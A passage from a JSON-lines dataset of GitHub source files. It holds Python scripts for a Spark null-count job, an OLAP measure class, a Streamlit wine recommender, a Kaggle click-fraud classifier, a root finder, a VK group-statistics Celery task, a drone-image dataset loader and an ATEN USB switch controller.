df=sqlContext.read.json(input_path) #read json file\n columns=df.columns #columns list\n counts=df.count()\n dct={'count':{},'percent':{}}\n for each in columns:\n count = df.filter(isnull(each)).count() #null filter\n dct['count'][each]=count\n dct['percent'][each]=float(count)/float(counts)\n dct['namelist']=list(set([int(i.name) for i in df.collect()]))\n dct['totalcount']=counts\n\n #add code here to write dict to local or HDFS\n\n\n","repo_name":"HiddenStrawberry/pyspark-sample","sub_path":"pyspark-json.py","file_name":"pyspark-json.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25003616081","text":"\nimport sqlalchemy\nimport common\nimport copy\nimport pyparsing\nimport operator\nfrom operator import add,sub\nfrom pyparsing import *\n\nfrom agregator import agregator\nimport axis_map\n\nclass measure(object):\n def __init__(self, name):\n self.name = name\n self.object = False\n def validate(self, cube):\n for measure in cube.measure_ids:\n if measure.name==self.name:\n self.object = measure\n if not self.object:\n raise 'This measure does not exist !'\n return True\n\n def run(self, metadata):\n table = common.table_get(metadata, self.object.cube_id.table_id)\n if self.object.measure_type == 'fact_column':\n col = common.col_get(sqlalchemy.Table(self.object.table_name,metadata), self.object.value_column)\n col_agregated = agregator[self.object.agregator](col)\n else:\n scalar = Word(alphanums+\"_\"+\" \"+\".\") \n sql_func = [\"sum\",\"max\",\"min\",\"count\",\"avg\"]\n arith_operator = [\"-\",\"*\",\"/\",\"+\"]\n \n sql_function = oneOf(' '.join(sql_func))\n leftRdBr = Literal(\"(\").suppress()\n rightRdBr = Literal(\")\").suppress()\n operator_arith = oneOf(' '.join(arith_operator))\n sqlexpression = sql_function.setResultsName('sql_func') + leftRdBr + delimitedList(scalar,\",\",combine=False) + rightRdBr | sql_function + leftRdBr + scalar + ZeroOrMore(operator_arith.setResultsName('arithmetic') + scalar) + rightRdBr \n res = sqlexpression.parseString(self.object.value_sql)\n operators = []\n cols = []\n function = None\n for item in res:\n if str(item) == res.sql_func:\n function = str(item)\n elif str(item) == res.arithmetic or str(item) in [\"+\",\"-\",\"/\",\"*\"]:\n operators.append(str(item))\n else:\n cols.append(common.measure_sql_exp_col(metadata,str(item)))\n operations = {\n '+':operator.add,\n '-':operator.sub,\n '/':operator.div,\n '%':operator.mod,\n '*':operator.mul,\n }\n operators = [operations[name] for name in operators]\n ops_cols = zip(operators, cols[1:])\n col = reduce(lambda expr, op_col: op_col[0](expr, op_col[1]), ops_cols,cols[0]) \n\n if function:\n col_agregated = agregator[function](col)\n else:\n col_agregated = col\n\n return [ {\n 'value': [(['measures',self.name], self.name, False)],\n 'query': {\n 'column': [col_agregated]\n },\n 'axis_mapping': axis_map.column_fixed(0),\n 'delta': 0,\n 'format':self.object.formatstring\n } ]\n\n def children(self, level, metadata):\n raise 'Not yet implemented !'\n\n def __repr__(self):\n res= '\\t\\t\\n' % (self.name,)\n return res\n\n# vim: ts=4 sts=4 sw=4 si et\n","repo_name":"factorlibre/openerp-extra-6.1","sub_path":"olap/cube/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"6"} +{"seq_id":"32060475995","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport numpy as np\nimport nltk\n#from nltk.corpus import stopwords\nfrom sentence_transformers import SentenceTransformer, util\nimport streamlit as st\nfrom PIL import Image\n\nSTOP_WORDS = {'m', 'hadn', 'yourself', 'this', 'what', 'from', 'will', 'herself', \n \"aren't\", 'too', \"that'll\", \"didn't\", 'did', 'how', 'ain', \"you'll\", \n 'into', 'off', 'than', 'now', 're', 'shan', \"shan't\", 'where', \"you'd\", \n \"needn't\", 'being', 'so', 'can', 'of', 'isn', 'or', \"hadn't\", 'then', \n 'he', 'with', 'won', \"wasn't\", 'wouldn', 'before', 'between', 'which', \n 'very', 'under', \"won't\", 'hers', \"you're\", 'it', 'over', 've', 'him', \n 'yourselves', 'was', 'himself', \"isn't\", 'ours', 'these', 'no',\n 'down', 'they', 'about', 'through', 'other', 'don', 'ourselves', 'my', \n \"mustn't\", \"weren't\", 'because', 'i', 'who', 'same', 'just', 'wasn', \n 'not', 'to', 'those', \"doesn't\", 'hasn', 'be', 'were', 'further', 'y', \n 'if', 'nor', 'am', \"wouldn't\", 's', 'theirs', 'most', \"should've\", 'her',\n 'only', 'our', 'below', 'haven', 'a', 'when', 'why', 'o', 'more', 'had',\n 'are', 'an', 'again', 'some', 'itself', 'mightn', 'been', 'after', \n \"don't\", 'didn', 'ma', 'she', 'have', 'against', 'is', 'yours', 'both', \n 'its', 'your', 'doesn', 'his', 'but', 'until', 'do', 'on', 'that', \n 'each', \"it's\", 'themselves', 'such', 'any', 't', 'couldn', 'the', \n \"she's\", 'does', 'their', 'doing', 'and', 'once', 'whom', 'we', 'all', \n \"you've\", 'has', 'aren', 'as', 'you', 'few', 'should', 'll', 'shouldn', \n 'there', 'above', 'own', \"hasn't\", 'at', \"haven't\", 'mustn', 'them', \n 'for', 'in', 'needn', 'me', \"couldn't\", 'during', \"mightn't\", 'weren', \n 'myself', 'here', 'by', 'out', \"shouldn't\", 'having', 'd',\n 'up', 'while'}\n\nst.set_page_config(layout=\"wide\")\n\n@st.experimental_memo\ndef get_punkt():\n nltk.download('punkt')\nget_punkt()\n\n@st.experimental_memo\ndef load_model():\n return SentenceTransformer('distilbert-base-nli-mean-tokens')\n\ndef process_sentences(sentences):\n word_tokens = nltk.word_tokenize(sentences)\n tokenized_sentence = [w for w in word_tokens if not w.lower() in STOP_WORDS]\n remove_punctuation = [word for word in tokenized_sentence if word.isalnum()]\n cleaned_text = ''\n for word in remove_punctuation:\n cleaned_text = cleaned_text +' ' + word \n return cleaned_text\n\nhead_image = Image.open('images/AromasImage03.png')\n\n@st.experimental_memo\ndef load_data():\n main_df = pd.read_csv('data/table_10k')\n df_des = (pd.read_csv('models/final_description_matrix_fp16').values).astype('float32')\n df_non_des = pd.read_csv('models/non_description_matrix').values\n return main_df, df_des, df_non_des\n\n[main_df, df_des, df_non_des] = load_data()\n\nrename_cols = {'country':'Country','variety':'Variety', 'winery':'Winery', \n 'points':'Points', 'price':'Price($)', 'designation':'Designation',\n 'description':'Description'}\nmain_df.rename(columns=rename_cols, inplace=True)\n\nst.title('Hello!')\nst.image(head_image, width=900)\nwith st.sidebar:\n st.write('Select the country, points, price and province of the wine \\\n you are looking for:')\n country =st.selectbox(\"Select country :\", ['any_country', 'Argentina',\n 'Australia', 'Austria', 'Chile', 'France', 'Italy', \\\n 'Other_country', 'Portugal','Spain', 'US'])\n points = st.selectbox(\"Select points :\", ['any_points', '79-85', \\\n '85-90', '90-95', '95-100'])\n price = st.selectbox(\"Select price :\", ['any_price', '0-10', '10-20',\n '20-30', '30-60', '>60'])\n province = st.selectbox(\"Select province :\", ['any_province', \\\n 'Bordeaux', 'California', 'Mendoza Province',\n 'Northeastern Italy', 'Northern Spain', 'Oregon', \\\n 'Other_province', 'Piedmont', 'Sicily & Sardinia', 'Tuscany', \\\n 'Washington'])\n\nuser_selections = [country, points, price, province]\ninput_values = ['any_country', 'any_points', 'any_price', 'any_province'] + user_selections\ninput_dict = {'any_country':0, 'any_points':1, 'any_price':2, 'any_province':3,\n 'Argentina':4, 'Australia':5, 'Austria':6, 'Chile':7, 'France':8, \n 'Italy':9, 'Other_country':10, 'Portugal':11, 'Spain':12, 'US':13, \n '79-85':14, '85-90':15, '90-95':16, '95-100':17, '0-10':18, '10-20':19,\n '20-30':20, '30-60':21, '>60':22, 'Bordeaux':23, 'California':25, \n 'Mendoza Province':25,'Northeastern Italy':26, 'Northern Spain':27, \n 'Oregon':28, 'Other_province':29, 'Piedmont':30,\n 'Sicily & Sardinia':31, 'Tuscany':32, 'Washington':33}\n\nuser_selection_input_array = np.zeros(len(input_dict))\nfor item in input_values:\n index = input_dict[item]\n user_selection_input_array[index] = 1\n\nuser_text_input = st.text_area('Write a description of the flavours you want \\\n : (e.g. Smokey, oaky, citrus, earthy, black pepper...)', )\nbutton_pressed = st.button('Give me wine recommendations')\ndef user_description_is_empty(user_text_input):\n if len(process_sentences(user_text_input)) > 0:\n return False\n return True\n\ndef user_selections_are_default(user_selections):\n if (user_selections[0]=='any_country' and \\\n user_selections[1]=='any_points' and \\\n user_selections[2]=='any_price' and \\\n user_selections[3]=='any_province'):\n return True\n return False\n\nuseful_features_from_main_df = ['Country','Variety', 'Winery', 'Points', \\\n 'Price($)', 'Designation','Description']\nuseful_features = ['country','variety', 'winery', 'points', 'price', \\\n 'designation','description']\n\nif button_pressed:\n out = np.dot(df_non_des, user_selection_input_array)\n best_ids_from_nondes_matrix = np.argwhere(out == np.max(out)).T[0]\n if user_description_is_empty(user_text_input):\n if not user_selections_are_default(user_selections):\n id = best_ids_from_nondes_matrix[0:6]\n recommendation = main_df.loc[id, useful_features_from_main_df]\n st.write(\"Here are our recommendations:\")\n st.write(recommendation)\n else:\n id = np.random.randint(low=0, high=len(best_ids_from_nondes_matrix), size=6)\n recommendation = main_df.loc[id, useful_features_from_main_df]\n st.write(\"Here are our recommendations:\")\n st.write(recommendation)\n else:\n model = load_model()\n processed_input = model.encode(process_sentences(user_text_input))\n #dotted_vec = np.dot(des_vec, processed_input)\n dotted_vec = util.cos_sim(df_des, processed_input)\n best_ids_from_des_matrix = np.array(dotted_vec).T[0].argsort()[-60:][::-1] #get top matches\n recommendation = pd.DataFrame(columns = useful_features_from_main_df)\n intersection = np.intersect1d(best_ids_from_nondes_matrix, best_ids_from_des_matrix)\n\n if len(intersection) == 0:\n id = best_ids_from_des_matrix[0:3]\n recommendation = main_df.loc[id, useful_features_from_main_df]\n recommendation.reset_index(drop=True, inplace=True)\n st.write('Umm... We do not have any exact matches... But \\\n here are some which we think you may like')\n st.write(recommendation)\n else:\n id = intersection[0:5]\n recommendation = main_df.loc[id, useful_features_from_main_df]\n recommendation.reset_index(drop=True, inplace=True)\n st.write(\"Here are our recommendations:\")\n st.write(recommendation)\n\n","repo_name":"AshwinSwar/Wine-Recommender-app","sub_path":"streamlit-app.py","file_name":"streamlit-app.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70150687869","text":"#!/usr/bin/env python3.5\n# coding=utf-8\n\n'''\n@date = '17/12/1'\n@author = 'lynnchan'\n@email = 'ccchen706@126.com'\n'''\n\n\nimport csv_reader\nimport numpy as np\n\nfrom sklearn.svm import SVC\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import LinearSVR\n\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\nimport random\nfrom sklearn.naive_bayes import MultinomialNB,BernoulliNB\nfrom sklearn.metrics import roc_auc_score,roc_curve\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import Binarizer\n\nfrom sklearn.linear_model import Perceptron,SGDClassifier,PassiveAggressiveClassifier\n\nData_reader = csv_reader.CsvReader('../DataSet/TalkingData')\nData_writer = csv_reader.CsvReader('../output')\n\nclfdir={'MNB':MultinomialNB(),\n 'BNB':BernoulliNB(),\n 'PT':Perceptron(),\n 'SG':SGDClassifier(),\n 'PAC':PassiveAggressiveClassifier()}\n\n\n# clfdir={'MNB':MultinomialNB(),\n# 'BNB':BernoulliNB()}\n\n\ndef get_next_data(train_data_chunk,persent=1,number=20000):\n print('get_next_data ')\n res_data = pd.DataFrame()\n test_data = pd.DataFrame()\n for data_chunk in train_data_chunk:\n if test_data.empty:\n test_data = data_chunk\n else:\n if random.randint(0, 10) > 2:\n data_with_label=data_chunk.loc[data_chunk['is_attributed']==1]\n data_without_label = data_chunk.loc[data_chunk['is_attributed'] == 0]\n persent_v=(len(data_with_label)/len(data_without_label))*persent\n if persent_v<1:\n df2 = data_without_label.sample(frac=persent_v)\n else:\n df2 = data_without_label\n if res_data.empty:\n res_data = pd.concat([df2,data_with_label], ignore_index=True)\n else:\n res_data = pd.concat([res_data,df2, data_with_label], ignore_index=True)\n\n if len(res_data) > number:\n X_train = res_data.iloc[:number, 1:5]\n Y_train = res_data.iloc[:number, 7:8]\n\n X_test=test_data.iloc[:number, 1:5]\n Y_test=test_data.iloc[:number, 7:8]\n\n yield X_train, Y_train,X_test,Y_test\n else:\n pass\n\ndef get_next_data_without_persent(train_data_chunk,number=2000):\n for data_chunk in train_data_chunk:\n X_train = data_chunk.iloc[:number, 1:5]\n Y_train = data_chunk.iloc[:number, 7:8]\n yield X_train,Y_train\n\ndef get_next_test_data(test_data_chunk):\n for data_chunk in test_data_chunk:\n id = data_chunk.iloc[:, :1]\n X_test = data_chunk.iloc[:, 2:6]\n yield id,X_test\n\n\nif __name__ == '__main__':\n\n train_data_chunk = Data_reader.read_data_chunk('train.csv',40000)\n get_next_data_chunk = get_next_data(train_data_chunk)\n for kv in clfdir.items():\n predict =kv[1]\n key=kv[0]\n print('use',key)\n all_classes = np.array([0, 1])\n\n socer = []\n\n for i, (X_train_text, y_train,X_test,Y_test) in enumerate(get_next_data_chunk):\n # train_data, vali_data, train_labels, vali_labels = \\\n # train_test_split(X_train_text, y_train, train_size=0.90, random_state=1)\n predict.partial_fit(X_train_text, y_train, classes=all_classes)\n # vali_data = get_next_data_without_persent(train_data_chunk)\n # pre_res_data = (np.array(predict.predict(X_test)))[:,1]\n pre_res_data = (np.array(predict.predict(X_test)))\n # print('shape',pre_res_data.shape)\n idx = 0\n idx_diff = 0\n # for inum,v in enumerate(pre_res_data):\n # print(v)\n # if v!=Y_test.values.flatten()[inum]:\n # idx_diff+=1\n # if v == 1:\n # idx+=1\n socer_roc=metrics.roc_auc_score(Y_test.values,pre_res_data)\n\n print('test data res::',socer_roc)\n\n socer.append(socer_roc)\n\n if i > 10:\n if (socer[-1]+socer[-2]+socer[-3]) <= (socer[-4]+socer[-5]+socer[-6]):\n print('train over :',socer[-1])\n break\n\n # print('use:',key,'value:',socer[-1],socer[-2],socer[-3],(socer[-1]+socer[-2]+socer[-3])/3)\n\n end_p = (socer[-1]+socer[-2]+socer[-3])/3\n\n print('end_p',end_p)\n\n if end_p >= 0.972:\n\n test_data_chunk = Data_reader.read_data_chunk('test.csv', 20000)\n get_next_test_data_chunk = get_next_test_data(test_data_chunk)\n\n for i, (id, X_test_text) in enumerate(get_next_test_data_chunk):\n res_data = np.array(predict.predict(X_test_text))\n print(id.values.flatten()[0],end=' | ')\n if i%20 == 1:\n print('')\n Data_writer.write_data_with_index(res_data, id.values.flatten(),\n 'TalkinSubmission'+key+str(end_p).replace('.','_')[:5]+'.csv',\n columns=('is_attributed',),index_name='click_id')\n\n\n\n","repo_name":"LynnChan706/learn_kaggle","sub_path":"TalkinDecisionTree.py","file_name":"TalkinDecisionTree.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17276717438","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Source: https://stackoverflow.com/questions/13054758/python-finding-multiple-roots-of-nonlinear-equation\n\nimport math\n\ndef rootsearch(f,a,b,dx):\n x1 = a; f1 = f(a)\n x2 = a + dx; f2 = f(x2)\n while f1*f2 > 0.0:\n if x1 >= b:\n return None,None\n x1 = x2; f1 = f2\n x2 = x1 + dx; f2 = f(x2)\n return x1,x2\n\ndef bisect(f,x1,x2,switch=0,epsilon=1.0e-9):\n f1 = f(x1)\n if f1 == 0.0:\n return x1\n f2 = f(x2)\n if f2 == 0.0:\n return x2\n if f1*f2 > 0.0:\n print('Root is not bracketed')\n return None\n n = int(math.ceil(math.log(abs(x2 - x1)/epsilon)/math.log(2.0)))\n for i in range(n):\n x3 = 0.5*(x1 + x2); f3 = f(x3)\n if (switch == 1) and (abs(f3) >abs(f1)) and (abs(f3) > abs(f2)):\n return None\n if f3 == 0.0:\n return x3\n if f2*f3 < 0.0:\n x1 = x3\n f1 = f3\n else:\n x2 =x3\n f2 = f3\n return (x1 + x2)/2.0\n\ndef roots(f, a, b, eps=1e-6):\n # print ('The roots on the interval [%f, %f] are:' % (a,b))\n lst_roots = []\n while 1:\n x1,x2 = rootsearch(f,a,b,eps)\n if x1 != None:\n a = x2\n root = bisect(f,x1,x2,1)\n if root != None:\n pass\n lst_roots.append(root)\n # print (round(root,-int(math.log(eps, 10))))\n else:\n # print ('\\nDone')\n break\n return lst_roots\n","repo_name":"songningqiang/FANFIC","sub_path":"src/extract_pdf_contours/root_solver.py","file_name":"root_solver.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9272087127","text":"import os\n\n# Define a base directory\n\n\n# Use os.path.join to create a complete file path\n\n\n#settings\nreligion= 'hindu'\nreqd_entity_labels= ('WORK_OF_ART','PRODUCT','PERSON','ORG','NORP','LOC','LAW','LANGUAGE','GPE','FAC','EVENT')\ngiven_names= ['ame','arthur','Tristan','Kieran']\naudio_format= '.wav'\n\nsettings= {\n \"synsets_off_religions\": ['christian']\n}\n\noutput_folder= os.path.join('data_christian','collected words')+os.sep\n# Use the resulting path in your configuration\npaths = {\n \"collected_words_path\": os.path.join(f\"data_{religion}\",'collected words'),\n \"book_directory_for_stories\": os.path.join(f'data_{religion}', \"book\",'story books'),\n \"book_directory_for_namebooks\": os.path.join(f'data_{religion}', \"book\",'name books'),\n \"complete_dictionary\": os.path.join(f'data_{religion}',\"results\",\"distance\",\"names.json\"),\n \"model_names_file\": os.path.join(f'data_{religion}','model_names','model_names.json'),\n \"model_names_folder\": os.path.join(f'data_{religion}','model_names'),\n \"save_directory\": os.path.join(f'data_{religion}','audio_data','doc_audio_data'),\n \"summed_distance_file\": os.path.join(f'data_{religion}','results','summed_distance','summed distance.json'),\n\n \"collected_name_audio_data\": os.path.join(f'data_{religion}',\"audio data\",\"collected name audio data\"),\n \"given name audio data\": os.path.join(f'data_{religion}',\"audio data\",\"given name audio data\"),\n \"summed_distance_file\": os.path.join(f'data_{religion}','results','summed_distance','summed distance.json'),\n \"distance\": os.path.join(f'data_{religion}','results','distance'),\n \"summed_distance\": os.path.join(f'data_{religion}','results','summed_distance'),\n \"person_names\": os.path.join(f'data_{religion}','collected words','person_names.json'),\n \"individual names\": os.path.join(f'data_{religion}','results','distance','each names'),\n \"sorted_by_length\": os.path.join(f'data_{religion}','results','sorted_by_wordlength')\n}\n","repo_name":"RamSankarTheDeveloper/TeenyTinyTitleTrove","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12809948230","text":"from celery import Celery\nimport requests\nfrom celery.schedules import crontab\nimport sqlite3\nfrom configparser import ConfigParser\nfrom exceptions import TakeGroupInfoException\n\n\"\"\"Создание приложения 'periodic' с брокером сообщений RabbitMQ\"\"\"\napp = Celery('periodic', broker=\"pyamqp://guest@localhost//\")\n\n\"\"\"Отключение службы часовых поясов для возможности использовать Celery местное время\"\"\"\napp.conf.enable_utc = False\n\n\n@app.task\ndef take_group_info():\n \"\"\"Получение ответа от VK_API, экстрация из него суммарного числа участников групп ВК\n и внесение этих данных в БД\"\"\"\n\n config = ConfigParser()\n config.read(\"settings.ini\")\n token = config.get(\"VK_API\", \"token\")\n version = config.get(\"VK_API\", \"version\")\n url = config.get(\"VK_API\", \"url\")\n group_ids = \"\".join(config.get(\"VK_API\", \"group_ids\"))\n fields = \"\".join(config.get(\"VK_API\", \"fields\"))\n\n \"\"\"Получение ответа от VK_API\"\"\"\n response = requests.get(url,\n params={\n 'access_token': token,\n 'v': version,\n 'group_ids': group_ids,\n 'fields': fields\n })\n\n \"\"\"Перехват исключений\"\"\"\n if response.status_code != 200:\n raise TakeGroupInfoException(f\"Response has unexcepted status code: {response.status_code}\")\n if not response.json()['response']:\n raise TakeGroupInfoException(\"Response has no dict 'response'.\")\n\n \"\"\"Экстракция данных из объекта response и подготовка их к внесению в БД\"\"\"\n data = response.json()['response']\n history_record = [(item['name'], item['members_count']) for item in data]\n list_groups = [(item['name'],) for item in data]\n\n \"\"\"Соединение с БД\"\"\"\n conn = sqlite3.connect(\"db_parser.db\")\n cursor = conn.cursor()\n\n \"\"\"Наполнение БД\"\"\"\n cursor.executemany(\"INSERT OR IGNORE INTO group_vk (name) VALUES (?)\", list_groups)\n cursor.executemany(\"INSERT OR IGNORE INTO history_record (name, members_count) VALUES (?, ?)\", history_record)\n\n \"\"\"Применение внесенных изменений в БД и закрытие БД\"\"\"\n conn.commit()\n conn.close()\n\n\ndef init_db():\n \"\"\"Создание БД\"\"\"\n conn = sqlite3.connect(\"db_parser.db\")\n cursor = conn.cursor()\n\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS group_vk \n (name TEXT PRIMARY KEY,\n created_db TIMESTAMP DEFAULT (datetime('now','localtime')))\"\"\")\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS history_record \n (name TEXT,\n members_count INT,\n created_db TIMESTAMP DEFAULT (datetime('now','localtime')))\"\"\")\n conn.commit()\n conn.close()\n\napp.conf.beat_schedule = {\n \"take_group_info-in-onetime-everyday-task\": {\n \"task\": \"periodic.take_group_info\",\n \"schedule\": crontab(hour=9, minute=13)\n }\n}\n\nif __name__ == '__main__':\n init_db()\n\n","repo_name":"ser-guzun/vk_parser","sub_path":"periodic.py","file_name":"periodic.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36145550284","text":"import os\nfrom PIL import Image \nimport numpy as np \nfrom data.BaseDataset import BaseDataset\nfrom transforms.bounding_box import BBox \n\nimport torch\nimport random\nimport torchvision.transforms as transforms\n\nclass VisDrone(BaseDataset):\n\tdef __init__(self, opt):\n\t\t# read all the image path\n\t\tself.opt = opt\n\t\tself.img_size = opt.img_size\n\t\tself.dataroot = opt.dataroot\n\t\tself.img_paths = self.get_paths(self.dataroot, '.jpg')\n\t\tself.label_paths = self.replace(self.img_paths)\n\n\t\tself.max_object =100\n\t\tself.multiscale = not opt.nomultiscale\n\t\tself.normalized_labels = opt.normalized_labels\n\t\tself.min_size = opt.img_size - 3 * 32\n\t\tself.max_size = opt.img_size + 3 * 32\n\t\t# Non maximum merge\n\t\t# NMM()\n\n\t# our assumption here is that:\n\t# the GPU device on UAVs can be very limited\n\t# and we want to make the large images as small as possible\n\t# so we split the images into small parts and deal with it\n\t# def __getitem__(self, index):\n\t# \timg_path = self.img_paths[index]\n\t# \tif not os.path.exists(img_path):\n\t# \t\tassert RuntimeError(\"Image path not find\")\n\t# \tlabel_path = self.label_paths[index]\n\t# \tif not os.path.exists(label_path):\n\t# \t\tassert RuntimeError(\"label path not find\")\n\n\t# \timg = Image.open(img_path).convert('RGB')\n\t# \tbboxes = BBox.from_visDrone(np.loadtxt(label_path, delimiter=',').reshape(-1,8), img.size)\n\t# \ttargets = bboxes.non_max_merge(box_size=540, iou_thresh=0.5).to_tensor()\n\tdef __getitem__(self, index):\n\t\timg_path = self.img_paths[index]\n\t\tif not os.path.exists(img_path):\n\t\t\tassert RuntimeError('Image path not find')\n\n\t\tlabel_path = self.label_paths[index]\n\t\tif not os.path.exists(label_path):\n\t\t\tassert RuntimeError('Label path not find')\n\n\t\timg = Image.open(img_path).convert('RGB')\n\t\tbboxes = BBox.from_visDrone(np.loadtxt(label_path, delimiter=',').reshape(-1,8), img.size)\n\n\t\t# target \n\t\t# still need the NMM to get the cluster\n\t\t\n\t\ttarget = bboxes.to_tensor()\n\t\tprint(target[0])\n\t\timg = transforms.ToTensor()(img)\n\n\t\t# handle gray scale channels\n\t\tif len(img.shape) != 3:\n\t\t\timg = img.unsqueeze(0)\n\t\t\timg = img.expand((3, img.shape[1:]))\n\n\t\t# add pad\n\t\t_, h, w = img.shape\n\t\th_factor, w_factor = (h, w) if self.normalized_labels else (1, 1)\n\t\timg, pad = self.pad_to_square(img, 0)\n\t\t_, padded_h, padded_w = img.shape\n\n\t\t# we only need to know whether there is a cluster or not\n\t\tx1 = w_factor * (target[:, 1] - target[:, 3] / 2)\n\t\tx2 = w_factor * (target[:, 1] + target[:, 3] / 2)\n\t\ty1 = h_factor * (target[:, 2] - target[:, 4] / 2)\n\t\ty2 = h_factor * (target[:, 2] + target[:, 4] / 2)\n\n\t\tx1 += pad[0]\n\t\tx2 += pad[0]\n\t\ty1 += pad[2]\n\t\ty2 += pad[2]\n\n\t\ttarget[:, 0] = 1\n\t\t# boxes format is (x1,y1, x2, y2)\n\t\ttarget[:, 1] = ((x1 + x2) / 2) / padded_w\n\t\ttarget[:, 2] = ((y1 + y2) / 2) / padded_h\n\t\ttarget[:, 3] *= w_factor / padded_w\n\t\ttarget[:, 4] *= h_factor / padded_h\n\n\t\timg_idx = torch.zeros(target.size(0), 1)\n\t\ttarget = torch.cat((img_idx, target), -1)\n\n\t\treturn img, target\n\n\tdef __len__(self):\n\t\treturn len(self.img_paths)\n\n\tdef name(self):\n\t\treturn 'visDroneDataset'\n\n\tdef collate_fn(self, batch):\n\t\timgs, targets = list(zip(*batch))\n\t\tcount = 0\n\t\tfor i, bboxes in enumerate(targets):\n\t\t\tbboxes[:, 0] = i\n\n\t\tif self.multiscale:\n\t\t\tself.img_size = random.choice(range(self.min_size, self.max_size + 1, 32))\n\n\t\timgs = torch.stack([self.resize(img, self.img_size) for img in imgs])\n\t\ttargets = torch.cat(targets, 0)\n\n\t\treturn imgs, targets\n\n\tdef get_paths(self, path, suffix='.jpg'):\n\t\timage_paths = []\n\t\tfor dirpath, subdirs, files in os.walk(path):\n\t\t\tfor file in files:\n\t\t\t\tif suffix in file:\n\t\t\t\t\timage_paths.append('/'.join([dirpath, file]))\n\t\treturn image_paths\n\n\tdef replace(self, paths, image='images/', label='annotations/'):\n\t\tlabel_path = []\n\t\tfor path in paths:\n\t\t\t# replace .jpg to .txt\n\t\t\tp = path[:-4]+'.txt'\n\t\t\tp = p.replace(image, label)\n\t\t\tlabel_path.append(p)\n\t\treturn label_path","repo_name":"tonyyang1995/AnchorFree","sub_path":"data/visDroneDataset.py","file_name":"visDroneDataset.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16370558726","text":"#!/usr/local/bin/python3.7\n# require py-hidapi\n\nimport sys\nimport hid\nimport argparse\nfrom time import sleep\n\nclass ATENUsbSwitch(object):\n def __init__(self, vendor_id=1367, product_id=9223):\n self.vendor_id = vendor_id\n self.product_id = product_id\n self.device = None\n\n def __del__(self):\n self._close()\n\n def _open(self):\n self.device = hid.device()\n for dev in hid.enumerate(self.vendor_id, self.product_id):\n if dev[\"interface_number\"] == 1:\n self.device.open_path(dev[\"path\"])\n\n def _close(self):\n if self.device:\n self.device.close()\n\n def is_active(self):\n try:\n self._open()\n status = self.device.read(4)\n self._close()\n except ValueError as e:\n return False\n else:\n return (status[1] & 0x01)\n\n def is_locked(self):\n try:\n self._open()\n status = self.device.read(4)\n self._close()\n except ValueError as e:\n return False\n else:\n return (status[1] & 0x02)\n\n def switch(self, wait=True):\n self._open()\n self.device.write([0x02, 0x11])\n self._close()\n wait_for_active = wait\n while wait_for_active:\n sleep(3)\n try:\n if self.is_active():\n wait_for_active = False\n except OSError as e:\n continue\n\n def lock(self):\n self._open()\n self.device.write([0x02, 0x11])\n self._close()\n\n def unlock(self):\n self._open()\n self.device.write([0x02, 0x20])\n self._close()\n\n def keep_locked(self):\n self._open()\n self.lock()\n while True:\n sleep(4)\n self.device.write([0x02, 0x40])\n self._close()\n\n\nif __name__ == \"__main__\":\n usbsw = ATENUsbSwitch()\n argp = argparse.ArgumentParser(description=\"ATEN USB Switch CLI\")\n argp.add_argument(\"-a\", \"--is-active\", dest=\"do_check\", action=\"store_true\", help=\"return 0 if we are the active host\")\n argp.add_argument(\"-s\", \"--switch\", dest=\"do_switch\", action=\"store_true\", help=\"switch ourselves to be the active host\")\n argp.add_argument(\"--carp\", dest=\"carp_mode\", action=\"store\", choices=[\"MASTER\", \"BACKUP\"],\n help=\"cleam switch based on CARP VIP status\")\n argp.add_argument(\"-v\", \"--verbose\", dest=\"be_verbose\", action=\"store_true\", help=\"verbose console messages\")\n args = argp.parse_args()\n\n if args.carp_mode:\n args.do_switch = True if args.carp_mode == \"MASTER\" else False\n args.do_check = True if args.carp_mode == \"BACKUP\" else False\n\n if args.do_check and args.do_switch and args.be_verbose:\n print(\"WARNING: both --is-active and --switch provided, ignoring --switch!\", file=sys.stderr)\n\n if args.do_check:\n if usbsw.is_active():\n if args.be_verbose:\n print(\"This host is active.\")\n sys.exit(0)\n else:\n if args.be_verbose:\n print(\"Another host is active.\")\n sys.exit(1)\n elif args.do_switch:\n if not usbsw.is_active():\n if args.be_verbose:\n print(\"Switching this host to active...\")\n usbsw.switch()\n if usbsw.is_active():\n if args.be_verbose:\n print(\"This host is now active.\")\n sys.exit(0)\n else:\n if args.be_verbose:\n print(\"ERROR: Failed to switch!\", file=sys.stderr)\n sys.exit(1)\n else:\n argp.print_help()\n sys.exit(2)\n","repo_name":"sjorge/aten-us221a-switcher","sub_path":"atenusbsw.py","file_name":"atenusbsw.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24402629655","text":"import torch\n\n\ndef load_mnist(is_train=True, flatten=True):\n from torchvision import datasets, transforms\n\n dataset = datasets.MNIST(\n '../data', 